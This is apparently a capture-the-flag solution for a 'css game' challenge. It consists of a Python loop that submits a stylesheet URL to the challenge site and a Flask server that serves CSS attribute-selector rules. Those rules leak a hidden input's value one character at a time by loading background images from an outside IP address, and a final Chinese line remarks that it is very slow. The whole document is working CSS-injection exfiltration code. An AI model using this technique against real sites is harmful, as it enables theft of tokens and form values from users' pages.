css game

import requests

import time

session = requests.session()

while 1:

burp0_url = "http://node4.anna.nssctf.cn:28872/crawl.html"

burp0_cookies = {"UM_distinctid": "176929086fa3a0-0b0ed985080c69-163b6153-13c680-176929086fb472", "_ga": "GA1.2.602800589.1608776974", "_gid": "GA1.2.1740085603.1609750409"}

burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Origin": "http://2c1fe10e-fee9-4956-b0f4-f87a2de7a0dc.node3.buuoj.cn", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://2c1fe10e-fee9-4956-b0f4-f87a2de7a0dc.node3.buuoj.cn/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}

burp0_data = {"css": "http://165.154.5.221:7001/poc.css"}

session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

time.sleep(3)

from flask import Flask
app = Flask(__name__)

dic = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}-"

result = ""

@app.route('/poc.css')
def payload():
    global result
    res = ''''''
    for i in dic:
        j = ''.join((result, i))
        res += '''input[name=flag][value^="'''+j+'''"] ~ * {background-image:url("http://165.154.5.221:7001/'''+j+'''");}\n'''
    return res, 200, [("Content-Type", "text/css")]

@app.route('/<flag>')
def all(flag):
    global result
    result = flag
    print(flag)
    return flag

app.run(host='0.0.0.0', port=7001)

很慢很慢